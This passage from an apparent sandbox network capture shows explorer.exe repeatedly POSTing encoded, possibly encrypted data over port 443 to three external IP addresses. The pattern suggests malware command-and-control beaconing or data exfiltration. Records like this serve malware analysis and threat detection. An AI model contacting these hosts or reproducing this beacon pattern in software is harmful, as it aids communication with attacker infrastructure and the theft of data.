acgfHYGEDMEuOEFgJRRQbmbuuBlRDn59vBGWK8d0kTItLO0AbkkQ8cAIvrFEFDyLEc5hrF8zNyaPm5w/0Xa+kp83p5geFWW1e/cwF2s5MKBWc94nYe6ATxlNbuM7/m1qW17t0UCi9Gcp4Fb77vzP+2Yl3qST85n3ofQ+Wj6Gw1nLQxj8/UmT9k/Z96t9NApo5Tio2TU83CbRD7y6stBaurOeWnIT94I/mvNmHw90ccZfbYzpmoh1Ig79Kclg8zI
2024-07-27 05:32:51 UTC	137	IN	HTTP/1.1 200 OK Content-Length: 685 Date: Sat, 27 Jul 2024 05:32:51 GMT Content-Type: text/plain; charset=utf-8 Connection: close
2024-07-27 05:32:51 UTC	685	IN	Data Raw: 52 34 4f 67 4a 62 79 4c 53 36 6a 4b 58 72 52 30 7a 2f 37 5a 6b 32 71 4d 6d 5a 68 38 42 4d 51 63 67 31 32 58 4a 74 64 51 61 4f 38 53 77 4c 46 34 32 51 4e 65 70 4b 54 4d 50 61 75 4e 6c 4f 61 43 74 58 32 44 2b 73 4f 71 69 57 7a 65 35 2b 36 57 78 69 59 6b 2f 54 52 75 50 49 72 6d 77 52 53 43 6d 47 4a 46 56 75 69 46 34 58 55 53 74 69 50 2b 54 6f 56 6f 37 49 42 6f 62 44 64 73 42 76 43 59 63 69 43 67 76 68 52 58 6c 44 42 4e 79 2b 6d 4a 6b 34 6d 6d 45 55 77 64 36 54 4b 4f 6b 51 30 2f 75 79 61 65 4e 35 75 43 4d 62 52 6f 49 6b 59 46 79 75 79 4e 72 41 35 37 46 77 72 39 6d 71 5a 64 69 46 67 6f 6a 4a 73 69 58 79 38 45 45 44 31 6f 54 6f 52 44 63 48 6b 37 49 48 6b 4c 41 47 32 59 73 74 65 37 6e 6e 77 4c 64 52 76 7a 43 36 50 6e 4d 6e 43 4e 62 44 72 54 66 68 66 4b 7a 75 59 Data Ascii: R4OgJbyLS6jKXrR0z/7Zk2qMmZh8BMQcg12XJtdQaO8SwLF42QNepKTMPauNlOaCtX2D+sOqiWze5+6WxiYk/TRuPIrmwRSCmGJFVuiF4XUStiP+ToVo7IBobDdsBvCYciCgvhRXlDBNy+mJk4mmEUwd6TKOkQ0/uyaeN5uCMbRoIkYFyuyNrA57Fwr9mqZdiFgojJsiXy8EED1oToRDcHk7IHkLAG2Yste7nnwLdRvzC6PnMnCNbDrTfhfKzuY

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
88	192.168.2.5	51920	107.173.160.137	443	1028	C:\Windows\explorer.exe

Timestamp	Bytes transferred	Direction	Data
2024-07-27 05:32:51 UTC	234	OUT	POST / HTTP/1.1 Host: 107.173.160.137 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 Connection: close Content-Type: text/plain Content-Length: 1122
2024-07-27 05:32:51 UTC	1122	OUT	Data Raw: 51 73 4b 56 52 51 6c 39 35 41 74 75 4a 53 6b 47 56 62 71 35 68 7a 6d 48 5a 45 42 78 31 47 38 46 48 77 63 32 65 6b 6b 6d 6c 52 36 57 4b 66 61 6c 71 65 47 4b 6e 54 67 36 4f 39 66 34 32 64 58 39 43 37 66 44 39 76 42 30 52 59 74 7a 6d 33 71 4b 69 6b 42 4c 55 6e 37 67 56 52 38 38 50 4b 6a 49 76 2b 64 35 31 53 38 64 73 4f 78 53 38 37 7a 43 72 35 75 34 65 50 6b 2b 2b 69 78 6b 50 79 30 64 2f 41 4f 2f 56 30 4b 70 59 64 66 61 47 6c 76 69 2f 68 4e 42 65 31 6b 77 4d 58 59 4f 51 69 7a 47 38 43 49 4d 4d 6b 4c 41 44 6e 6c 37 72 75 76 71 76 6d 6a 76 51 4f 6f 33 35 4e 49 32 38 56 68 71 6c 46 55 62 49 33 35 55 5a 69 72 38 69 37 33 33 64 6e 63 34 2b 6a 77 6e 4b 31 53 54 6e 75 76 43 43 48 6f 4c 41 49 6f 75 73 73 5a 46 2b 34 53 59 57 54 66 79 36 4d 34 4d 47 2b 4c 70 44 71 31 Data Ascii: QsKVRQl95AtuJSkGVbq5hzmHZEBx1G8FHwc2ekkmlR6WKfalqeGKnTg6O9f42dX9C7fD9vB0RYtzm3qKikBLUn7gVR88PKjIv+d51S8dsOxS87zCr5u4ePk++ixkPy0d/AO/V0KpYdfaGlvi/hNBe1kwMXYOQizG8CIMMkLADnl7ruvqvmjvQOo35NI28VhqlFUbI35UZir8i733dnc4+jwnK1STnuvCCHoLAIoussZF+4SYWTfy6M4MG+LpDq1
2024-07-27 05:32:53 UTC	137	IN	HTTP/1.1 200 OK Content-Length: 685 Date: Sat, 27 Jul 2024 05:32:53 GMT Content-Type: text/plain; charset=utf-8 Connection: close
2024-07-27 05:32:53 UTC	685	IN	Data Raw: 49 58 79 6e 47 66 41 30 42 6b 63 34 6b 79 77 7a 4f 67 74 31 2f 35 36 39 6f 5a 45 47 6e 52 44 59 65 30 53 6a 37 6c 6c 65 6e 58 41 71 34 52 6b 4a 55 35 77 44 34 64 6e 2b 42 70 59 4e 56 57 34 57 74 44 38 66 75 4c 7a 75 46 6e 4d 6c 67 6e 53 49 6a 58 48 75 6a 4b 30 4c 64 33 62 71 37 78 6b 59 62 6c 35 53 71 4b 51 66 52 47 68 36 79 6b 47 33 58 48 4b 72 78 51 4d 53 42 57 46 47 31 49 71 5a 6e 30 55 6b 4d 57 46 30 72 34 61 43 56 48 66 4f 78 6d 4b 56 30 33 48 74 6b 76 68 6b 52 4e 58 76 33 70 51 76 72 4d 65 78 39 68 67 77 55 6c 44 6a 4f 54 43 33 49 4f 45 78 53 64 4e 36 78 34 76 78 6a 4a 72 72 61 73 51 55 36 74 4e 59 61 4c 49 49 64 70 36 4b 7a 47 43 55 50 34 45 4a 55 33 62 55 67 4e 53 59 54 33 70 61 59 59 4e 43 42 38 30 72 55 37 6b 50 6b 75 52 76 53 6a 36 49 75 52 62 Data Ascii: IXynGfA0Bkc4kywzOgt1/569oZEGnRDYe0Sj7llenXAq4RkJU5wD4dn+BpYNVW4WtD8fuLzuFnMlgnSIjXHujK0Ld3bq7xkYbl5SqKQfRGh6ykG3XHKrxQMSBWFG1IqZn0UkMWF0r4aCVHfOxmKV03HtkvhkRNXv3pQvrMex9hgwUlDjOTC3IOExSdN6x4vxjJrrasQU6tNYaLIIdp6KzGCUP4EJU3bUgNSYT3paYYNCB80rU7kPkuRvSj6IuRb

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
89	192.168.2.5	51921	107.173.160.139	443	1028	C:\Windows\explorer.exe

Timestamp	Bytes transferred	Direction	Data
2024-07-27 05:32:54 UTC	234	OUT	POST / HTTP/1.1 Host: 107.173.160.139 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 Connection: close Content-Type: text/plain Content-Length: 1122
2024-07-27 05:32:54 UTC	1122	OUT	Data Raw: 47 69 50 46 32 52 53 36 33 30 77 32 42 4f 4d 52 4f 54 49 47 51 79 4c 6e 61 6b 5a 68 6b 70 78 34 35 69 74 70 48 6d 44 4f 70 49 37 70 4b 44 72 4f 69 6d 69 57 77 75 46 47 76 46 55 67 72 42 55 70 43 4d 4d 2b 39 4e 66 4e 70 39 6f 7a 57 32 42 6a 6b 73 71 32 37 70 4f 52 74 32 4f 31 2f 41 4c 69 55 44 47 51 2b 4c 69 38 74 6c 53 38 68 46 32 79 6a 47 73 41 6b 6f 76 75 69 57 79 61 4d 46 4b 54 35 43 59 31 4b 37 63 30 32 64 50 41 4d 4f 2b 73 74 45 63 38 2b 35 75 30 53 57 75 6c 74 4e 45 6f 79 53 54 6d 74 2b 48 70 41 4c 51 49 39 2b 79 33 44 74 48 6d 4a 53 69 66 56 62 51 34 6c 6f 4a 39 56 47 4b 49 6d 38 33 43 38 4f 71 79 65 33 47 45 6b 39 76 30 76 65 6a 6e 66 4e 55 48 34 64 6f 4c 45 54 44 44 31 6e 70 35 4d 69 63 43 68 53 2b 6a 52 72 67 43 2f 6f 50 66 4a 4a 65 41 6c 4b 34 Data Ascii: GiPF2RS630w2BOMROTIGQyLnakZhkpx45itpHmDOpI7pKDrOimiWwuFGvFUgrBUpCMM+9NfNp9ozW2Bjksq27pORt2O1/ALiUDGQ+Li8tlS8hF2yjGsAkovuiWyaMFKT5CY1K7c02dPAMO+stEc8+5u0SWultNEoySTmt+HpALQI9+y3DtHmJSifVbQ4loJ9VGKIm83C8Oqye3GEk9v0vejnfNUH4doLETDD1np5MicChS+jRrgC/oPfJJeAlK4
2024-07-27 05:32:55 UTC	137	IN	HTTP/1.1 200 OK Content-Length: 685 Date: Sat, 27 Jul 2024 05:32:55 GMT Content-Type: text/plain; charset=utf-8 Connection: close
2024-07-27 05:32:55 UTC	685	IN	Data Raw: 69 69 39 71 35 71 46 53 37 68 79 79 53 74 61 6b 4b 74 35 68 68 6a 57 74 54 4f 30 55 39 37 63 63 67 78 72 51 41 5a 59 51 49 57 36 78 6d 6f 4b 4c 69 66 49 35 65 74 7a 6c 6e 32 6d 36 38 48 71 77 43 61 69 39 57 52 66 6e 43 66 6e 38 4c 47 4f 63 76 66 72 6d 39 4b 64 2b 51 73 64 43 57 41 6e 66 54 70 6c 7a 53 74 67 76 4f 71 35 35 38 73 79 4e 7a 45 37 2b 35 32 37 73 58 39 31 4f 51 49 69 2b 69 50 6f 49 57 31 50 51 4b 4e 46 4b 6d 62 7a 36 33 6c 61 30 6f 52 69 38 43 6a 44 74 73 78 44 54 35 4c 4a 2b 51 38 57 44 61 65 43 57 4e 38 4c 2f 32 70 77 77 44 4e 44 43 56 62 55 4b 47 79 37 33 2f 64 78 76 43 6e 39 79 34 69 57 75 31 59 71 67 36 5a 56 35 32 77 31 78 70 6b 58 30 39 43 7a 76 75 66 31 4d 30 34 4b 6a 55 49 65 45 46 53 71 68 4f 63 71 43 43 2f 39 37 36 5a 59 54 4b 2b 70 Data Ascii: ii9q5qFS7hyyStakKt5hhjWtTO0U97ccgxrQAZYQIW6xmoKLifI5etzln2m68HqwCai9WRfnCfn8LGOcvfrm9Kd+QsdCWAnfTplzStgvOq558syNzE7+527sX91OQIi+iPoIW1PQKNFKmbz63la0oRi8CjDtsxDT5LJ+Q8WDaeCWN8L/2pwwDNDCVbUKGy73/dxvCn9y4iWu1Yqg6ZV52w1xpkX09Czvuf1M04KjUIeEFSqhOcqCC/976ZYTK+p

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
90	192.168.2.5	51922	167.235.128.153	443	1028	C:\Windows\explorer.exe

Timestamp	Bytes transferred	Direction	Data
2024-07-27 05:32:56 UTC	234	OUT	POST / HTTP/1.1 Host: 167.235.128.153 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 Connection: close Content-Type: text/plain Content-Length: 1122
2024-07-27 05:32:56 UTC	1122	OUT	Data Raw: 4b 4e 50 2b 44 30 37 6b 45 66 4c 31 46 4f 42 74 74 78 73 50 43 57 74 56 70 36 38 4d 32 54 47 2f 53 59 53 36 5a 79 4c 35 63 6d 39 35 77 43 63 57 2b 36 71 69 5a 36 68 59 43 74 38 57 6f 7a 4f 76 43 49 55 54 30 45 71 77 49 67 53 45 74 35 35 6d 50 56 79 36 47 46 38 6a 76 67 6d 53 42 73 45 6f 42 79 52 4a 50 49 43 67 44 49 62 48 72 65 58 76 67 4f 66 62 30 37 79 37 2f 61 74 68 30 77 7a 68 4f 67 39 4a 71 4f 73 38 77 74 41 71 67 71 65 6f 51 53 38 68 35 58 77 4e 4f 2b 6e 6d 64 4b 79 4a 68 49 41 4a 57 52 71 71 34 76 4c 41 6a 2f 55 53 6d 65 35 42 52 52 44 55 46 47 2b 6e 74 41 4c 63 61 51 57 35 74 43 38 4d 56 74 69 54 75 77 31 41 59 31 71 4d 44 72 74 31 73 4c 31 74 70 58 36 36 5a 73 35 4f 76 51 69 6c 37 7a 6a 73 75 5a 71 53 6b 4d 69 74 6b 4d 5a 52 62 55 57 4e 4b 2b 30 Data Ascii: KNP+D07kEfL1FOBttxsPCWtVp68M2TG/SYS6ZyL5cm95wCcW+6qiZ6hYCt8WozOvCIUT0EqwIgSEt55mPVy6GF8jvgmSBsEoByRJPICgDIbHreXvgOfb07y7/ath0wzhOg9JqOs8wtAqgqeoQS8h5XwNO+nmdKyJhIAJWRqq4vLAj/USme5BRRDUFG+ntALcaQW5tC8MVtiTuw1AY1qMDrt1sL1tpX66Zs5OvQil7zjsuZqSkMitkMZRbUWNK+0
2024-07-27 05:32:57 UTC	137	IN	HTTP/1.1 200 OK Content-Length: 685 Date: Sat, 27 Jul 2024 05:32:57 GMT Content-Type: text/plain; charset=utf-8 Connection: close
2024-07-27 05:32:57 UTC	685	IN	Data Raw: 4f 31 38 67 47 64 38 73 66 79 41 2f 39 67 43 63 6c 32 59 45 6d 53 6c 6a 6f 35 57 48 73 53 49 74 59 51 74 57 39 70 37 48 65 4d 6f 70 4e 30 58 56 4e 62 54 6f 6e 68 33 62 6b 35 7a 32 73 45 58 58 69 4c 31 6b 31 56 55 2b 74 36 76 36 51 5a 33 77 43 62 54 41 32 38 6e 4c 7a 73 49 6d 30 6a 49 58 79 6f 53 6c 2f 32 37 55 65 45 70 70 39 31 62 2f 62 79 56 53 5a 59 61 42 39 4c 62 7a 57 33 37 45 73 55 31 36 6f 57 38 4a 6f 5a 6f 61 59 54 54 67 50 43 43 6e 72 4d 30 48 47 6d 6b 34 7a 6e 42 49 48 4f 2f 68 35 76 74 52 5a 6f 73 73 68 4c 73 52 53 70 61 43 30 6e 4a 41 68 51 4f 77 4a 65 63 48 46 6d 4e 59 6f 47 53 36 31 72 31 2b 63 4f 4e 35 67 44 36 48 5a 32 71 39 66 59 46 41 6a 41 34 43 37 32 4f 74 31 61 72 66 44 70 6b 33 4d 61 4a 75 68 42 2b 36 53 54 61 59 67 56 78 69 53 79 76 Data Ascii: O18gGd8sfyA/9gCcl2YEmSljo5WHsSItYQtW9p7HeMopN0XVNbTonh3bk5z2sEXXiL1k1VU+t6v6QZ3wCbTA28nLzsIm0jIXyoSl/27UeEpp91b/byVSZYaB9LbzW37EsU16oW8JoZoaYTTgPCCnrM0HGmk4znBIHO/h5vtRZosshLsRSpaC0nJAhQOwJecHFmNYoGS61r1+cON5gD6HZ2q9fYFAjA4C72Ot1arfDpk3MaJuhB+6STaYgVxiSyv

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
91	192.168.2.5	51923	107.173.160.137	443	1028	C:\Windows\explorer.exe

Timestamp	Bytes transferred	Direction	Data
2024-07-27 05:32:57 UTC	234	OUT	POST / HTTP/1.1 Host: 107.173.160.137 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 Connection: close Content-Type: text/plain Content-Length: 1122
2024-07-27 05:32:57 UTC	1122	OUT	Data Raw: 62 51 55 6b 79 41 6b 7a 31 39 51 65 6d 76 35 42 57 77 6a 72 34 4e 76 2b 6f 52 30 35 68 56 72 53 35 4c 32 39 66 72 78 55 66 68 4e 7a 57 4c 69 58 31 50 30 63 50 70 78 69 63 69 6c 70 7a 54 42 73 74 67 2f 78 2f 64 66 33 54 4e 6b 69 52 66 62 71 64 48 66 4f 42 74 5a 45 56 65 73 5a 39 56 31 35 55 41 7a 30 36 35 57 58 75 6b 78 4a 69 4f 58 48 63 45 62 4c 4a 48 43 43 6c 30 43 38 69 66 78 2b 76 70 77 52 46 38 49 33 52 6b 38 75 6e 49 68 2b 73 43 53 32 77 2b 73 49 35 6d 47 6c 59 4b 66 72 35 4e 66 6c 73 47 46 54 43 71 5a 6b 64 59 47 6a 6d 54 33 76 4a 31 45 34 47 55 55 41 31 64 67 51 55 50 44 76 36 64 73 59 46 54 49 4e 2f 4e 41 73 59 7a 33 4d 71 52 63 2f 74 4a 6a 33 54 55 4c 71 31 39 4d 55 59 73 34 78 51 55 6f 32 58 73 67 4c 6f 79 43 42 50 36 65 72 56 65 72 57 76 69 31 Data Ascii: bQUkyAkz19Qemv5BWwjr4Nv+oR05hVrS5L29frxUfhNzWLiX1P0cPpxicilpzTBstg/x/df3TNkiRfbqdHfOBtZEVesZ9V15UAz065WXukxJiOXHcEbLJHCCl0C8ifx+vpwRF8I3Rk8unIh+sCS2w+sI5mGlYKfr5NflsGFTCqZkdYGjmT3vJ1E4GUUA1dgQUPDv6dsYFTIN/NAsYz3MqRc/tJj3TULq19MUYs4xQUo2XsgLoyCBP6erVerWvi1
2024-07-27 05:32:59 UTC	137	IN	HTTP/1.1 200 OK Content-Length: 685 Date: Sat, 27 Jul 2024 05:32:59 GMT Content-Type: text/plain; charset=utf-8 Connection: close
2024-07-27 05:32:59 UTC	685	IN	Data Raw: 6e 58 52 4e 6a 61 30 68 36 4d 78 74 54 79 76 57 4b 6b 61 75 6e 69 34 42 35 57 64 62 4e 66 56 62 39 39 55 47 63 56 69 46 6e 6c 41 46 42 32 67 63 47 35 43 49 4c 61 38 5a 75 4f 42 68 50 77 56 73 34 45 6c 30 63 6a 46 52 30 34 67 32 74 41 78 48 45 65 79 6e 64 34 70 73 74 45 46 59 73 2b 6e 6e 45 76 4b 2b 63 59 4f 30 55 4f 6e 30 35 2f 66 46 54 44 54 68 58 67 5a 43 71 48 46 74 4f 5a 43 53 33 5a 30 77 44 50 78 2b 4d 39 43 6a 79 62 70 48 62 2f 30 61 37 4f 71 57 30 69 61 6e 6b 62 5a 47 49 62 34 4e 56 6e 38 6c 51 65 79 73 56 70 55 61 39 62 43 4f 75 48 70 6c 33 6d 4a 36 77 52 78 76 4a 73 4d 44 46 53 34 35 43 43 42 61 39 67 35 7a 77 78 68 5a 50 6e 74 38 74 62 57 30 70 4d 68 5a 72 31 68 42 75 35 39 4f 6b 36 6f 67 54 7a 73 41 39 65 51 4f 74 49 30 6d 77 56 53 50 69 79 72 Data Ascii: nXRNja0h6MxtTyvWKkauni4B5WdbNfVb99UGcViFnlAFB2gcG5CILa8ZuOBhPwVs4El0cjFR04g2tAxHEeynd4pstEFYs+nnEvK+cYO0UOn05/fFTDThXgZCqHFtOZCS3Z0wDPx+M9CjybpHb/0a7OqW0iankbZGIb4NVn8lQeysVpUa9bCOuHpl3mJ6wRxvJsMDFS45CCBa9g5zwxhZPnt8tbW0pMhZr1hBu59Ok6ogTzsA9eQOtI0mwVSPiyr

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
92	192.168.2.5	51924	107.173.160.139	443	1028	C:\Windows\explorer.exe

Timestamp	Bytes transferred	Direction	Data
2024-07-27 05:32:59 UTC	234	OUT	POST / HTTP/1.1 Host: 107.173.160.139 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 Connection: close Content-Type: text/plain Content-Length: 1267
2024-07-27 05:32:59 UTC	1267	OUT	Data Raw: 61 73 67 73 54 4d 64 33 47 64 54 76 6b 42 4f 69 70 76 56 34 73 79 52 34 70 44 67 53 48 5a 4c 55 37 6e 71 6c 6e 57 61 2b 6d 44 57 73 48 7a 38 66 77 58 4f 61 44 78 65 63 52 6a 76 7a 45 5a 75 39 30 68 47 66 4f 66 76 54 79 48 4b 51 44 64 67 50 57 52 47 65 70 6b 34 31 46 6a 67 76 73 58 52 51 43 31 55 39 72 77 7a 48 50 4e 4a 4d 62 34 48 44 33 54 5a 39 74 66 36 49 70 44 4f 56 49 46 71 4d 51 50 79 76 64 78 56 2b 46 61 58 6b 48 31 41 36 44 48 51 67 72 73 4b 36 4a 67 2b 77 4d 38 65 4c 6f 59 72 68 6a 77 6c 30 48 55 4e 63 71 48 41 6a 41 48 61 39 43 39 44 42 50 6d 5a 43 66 6b 48 35 58 49 69 2f 65 66 6e 54 57 37 49 41 34 4b 55 49 71 67 48 2f 4d 76 77 6d 30 78 6b 4d 4f 6e 38 57 39 56 48 55 66 62 52 47 78 4b 50 35 4b 35 73 70 69 69 34 54 57 45 72 4c 5a 42 45 75 75 54 67 Data Ascii: asgsTMd3GdTvkBOipvV4syR4pDgSHZLU7nqlnWa+mDWsHz8fwXOaDxecRjvzEZu90hGfOfvTyHKQDdgPWRGepk41FjgvsXRQC1U9rwzHPNJMb4HD3TZ9tf6IpDOVIFqMQPyvdxV+FaXkH1A6DHQgrsK6Jg+wM8eLoYrhjwl0HUNcqHAjAHa9C9DBPmZCfkH5XIi/efnTW7IA4KUIqgH/Mvwm0xkMOn8W9VHUfbRGxKP5K5spii4TWErLZBEuuTg
2024-07-27 05:33:01 UTC	137	IN	HTTP/1.1 200 OK Content-Length: 685 Date: Sat, 27 Jul 2024 05:33:01 GMT Content-Type: text/plain; charset=utf-8 Connection: close
2024-07-27 05:33:01 UTC	685	IN	Data Raw: 55 72 72 74 37 6a 62 6d 64 39 69 45 44 4a 36 72 2b 38 59 39 72 57 34 49 62 71 46 30 66 41 6c 57 52 6f 58 6c 6d 76 41 6c 33 4e 54 30 58 4d 43 38 65 33 55 72 57 4d 78 50 43 58 6e 56 70 4f 6b 6e 77 75 42 59 6e 47 4c 62 54 41 78 6e 39 47 36 48 76 63 72 57 75 4e 72 78 69 4c 75 66 39 30 66 65 2f 74 6b 49 51 54 77 64 4b 42 32 62 78 72 4b 57 4e 78 66 37 43 5a 32 51 37 72 49 75 30 62 58 54 6f 6b 79 78 69 52 71 4a 55 5a 6a 2b 42 47 6f 4f 50 78 39 55 55 30 6f 79 55 44 4d 38 6f 6f 65 79 58 43 71 67 39 5a 6a 75 55 32 4e 6e 55 79 45 39 51 52 59 70 50 54 62 54 43 6f 50 49 77 59 6b 4d 71 55 38 44 4f 6e 46 4e 65 30 45 61 56 47 63 51 66 68 36 72 36 55 31 37 38 78 38 69 31 34 65 43 70 4d 53 46 56 44 65 6a 7a 30 56 4f 4c 73 58 2b 73 47 36 6f 53 69 33 4a 45 53 47 4e 62 31 36 Data Ascii: Urrt7jbmd9iEDJ6r+8Y9rW4IbqF0fAlWRoXlmvAl3NT0XMC8e3UrWMxPCXnVpOknwuBYnGLbTAxn9G6HvcrWuNrxiLuf90fe/tkIQTwdKB2bxrKWNxf7CZ2Q7rIu0bXTokyxiRqJUZj+BGoOPx9UU0oyUDM8ooeyXCqg9ZjuU2NnUyE9QRYpPTbTCoPIwYkMqU8DOnFNe0EaVGcQfh6r6U178x8i14eCpMSFVDejz0VOLsX+sG6oSi3JESGNb16

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
93	192.168.2.5	51926	167.235.128.153	443	1028	C:\Windows\explorer.exe

Timestamp	Bytes transferred	Direction	Data
2024-07-27 05:33:02 UTC	234	OUT	POST / HTTP/1.1 Host: 167.235.128.153 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 Connection: close Content-Type: text/plain Content-Length: 1122
2024-07-27 05:33:02 UTC	1122	OUT	Data Raw: 48 67 6b 65 43 4f 61 47 36 76 53 65 61 4e 4d 38 73 38 63 65 63 63 6d 56 54 58 50 6f 4f 45 69 51 54 48 34 6e 38 64 6f 37 78 4c 48 65 67 6f 78 59 6d 63 69 49 50 73 6d 58 77 69 65 2f 49 51 4b 4a 4c 32 75 53 53 44 32 39 64 53 61 35 46 59 56 50 2f 51 78 4a 52 55 67 41 50 64 38 57 50 4e 48 61 4c 77 6e 49 63 6a 58 61 39 41 77 42 50 44 5a 43 45 70 57 30 68 42 56 4f 30 2b 77 59 32 73 59 62 66 48 30 2b 49 55 6c 76 55 53 63 6e 4f 53 35 42 72 70 4d 42 57 4d 50 4e 6d 46 5a 4d 34 41 66 5a 54 6a 46 42 48 48 78 78 35 38 41 68 5a 4f 45 50 55 38 55 4a 49 4b 73 70 44 54 37 46 4c 50 2f 78 4b 45 33 46 78 45 4a 71 42 48 5a 2b 72 75 43 4d 31 57 76 52 36 77 69 76 62 55 58 79 70 61 31 68 35 37 2b 4a 48 66 43 2b 56 38 4f 4e 78 6e 6f 71 45 63 6b 63 4d 48 69 57 71 75 7a 69 38 46 62 Data Ascii: HgkeCOaG6vSeaNM8s8ceccmVTXPoOEiQTH4n8do7xLHegoxYmciIPsmXwie/IQKJL2uSSD29dSa5FYVP/QxJRUgAPd8WPNHaLwnIcjXa9AwBPDZCEpW0hBVO0+wY2sYbfH0+IUlvUScnOS5BrpMBWMPNmFZM4AfZTjFBHHxx58AhZOEPU8UJIKspDT7FLP/xKE3FxEJqBHZ+ruCM1WvR6wivbUXypa1h57+JHfC+V8ONxnoqEckcMHiWquzi8Fb
2024-07-27 05:33:03 UTC	137	IN	HTTP/1.1 200 OK Content-Length: 685 Date: Sat, 27 Jul 2024 05:33:02 GMT Content-Type: text/plain; charset=utf-8 Connection: close
2024-07-27 05:33:03 UTC	685	IN	Data Raw: 6c 43 55 38 49 7a 61 61 66 59 52 66 51 31 4d 61 59 6c 44 74 31 50 30 49 77 62 79 35 57 30 61 6b 46 74 65 4e 51 58 6e 4b 35 6f 63 4a 32 73 69 66 50 67 30 78 76 6b 7a 75 31 45 63 4c 57 54 70 44 49 56 2b 2f 55 32 67 77 41 72 75 35 71 41 35 75 76 4a 67 71 6f 43 49 75 64 56 37 4a 5a 51 31 53 65 79 42 53 33 74 71 73 58 6c 44 71 59 30 77 4d 6a 6b 7a 46 47 62 72 62 76 6f 59 54 6d 5a 6a 45 77 7a 71 4c 30 4d 30 7a 69 30 52 4d 33 4e 34 35 5a 73 6c 70 4b 79 30 67 5a 4d 59 37 41 52 47 53 4c 6a 58 41 37 50 66 38 31 57 37 42 7a 6b 58 4c 41 6d 6c 42 37 6b 64 74 2f 54 31 76 4e 4e 4a 52 6b 4a 48 6d 52 6f 78 65 36 72 33 6f 58 43 72 35 6d 49 6c 64 41 61 6d 6b 4f 79 51 57 4f 53 58 67 52 46 6f 37 69 48 7a 4b 56 46 78 6b 46 4c 30 6c 6e 73 53 66 4a 71 57 54 33 4e 59 46 56 2b 46 Data Ascii: lCU8IzaafYRfQ1MaYlDt1P0Iwby5W0akFteNQXnK5ocJ2sifPg0xvkzu1EcLWTpDIV+/U2gwAru5qA5uvJgqoCIudV7JZQ1SeyBS3tqsXlDqY0wMjkzFGbrbvoYTmZjEwzqL0M0zi0RM3N45ZslpKy0gZMY7ARGSLjXA7Pf81W7BzkXLAmlB7kdt/T1vNNJRkJHmRoxe6r3oXCr5mIldAamkOyQWOSXgRFo7iHzKVFxkFL0lnsSfJqWT3NYFV+F

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
94	192.168.2.5	51927	107.173.160.137	443	1028	C:\Windows\explorer.exe

Timestamp	Bytes transferred	Direction	Data
2024-07-27 05:33:03 UTC	234	OUT	POST / HTTP/1.1 Host: 107.173.160.137 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 Connection: close Content-Type: text/plain Content-Length: 1122
2024-07-27 05:33:03 UTC	1122	OUT	Data Raw: 4c 4e 7a 30 79 7a 55 62 4e 58 33 57 56 51 53 66 34 49 37 2f 63 69 6b 53 33 42 7a 65 36 4e 4b 64 6b 2b 58 2b 61 62 41 68 30 33 44 66 6b 66 41 69 43 62 63 6f 58 45 45 66 54 44 43 76 4d 32 46 55 4f 4a 64 39 32 65 47 31 7a 36 2b 41 6e 69 4a 4a 61 42 4d 51 62 77 6e 58 5a 73 44 32 62 79 6a 75 42 64 42 71 64 41 56 46 6f 2b 74 2f 62 56 44 44 4f 65 49 62 66 68 36 74 4d 75 34 49 6f 4c 4e 70 6b 48 62 45 76 49 39 4c 5a 6e 75 7a 56 6d 72 39 61 68 52 76 30 4e 5a 30 49 6a 55 46 4b 68 46 38 59 70 53 73 36 47 53 4c 68 68 49 31 68 46 37 43 75 53 6a 50 4f 41 4e 76 55 39 70 54 38 65 32 54 66 4b 75 67 53 53 31 52 72 42 53 6f 66 4e 52 72 33 41 78 46 41 62 37 55 51 53 56 78 55 54 70 61 6d 74 46 6b 79 74 4c 34 47 57 6d 6c 6c 54 37 6a 2f 67 75 44 37 45 30 70 45 35 6a 51 65 74 4d Data Ascii: LNz0yzUbNX3WVQSf4I7/cikS3Bze6NKdk+X+abAh03DfkfAiCbcoXEEfTDCvM2FUOJd92eG1z6+AniJJaBMQbwnXZsD2byjuBdBqdAVFo+t/bVDDOeIbfh6tMu4IoLNpkHbEvI9LZnuzVmr9ahRv0NZ0IjUFKhF8YpSs6GSLhhI1hF7CuSjPOANvU9pT8e2TfKugSS1RrBSofNRr3AxFAb7UQSVxUTpamtFkytL4GWmllT7j/guD7E0pE5jQetM
2024-07-27 05:33:05 UTC	137	IN	HTTP/1.1 200 OK Content-Length: 685 Date: Sat, 27 Jul 2024 05:33:05 GMT Content-Type: text/plain; charset=utf-8 Connection: close
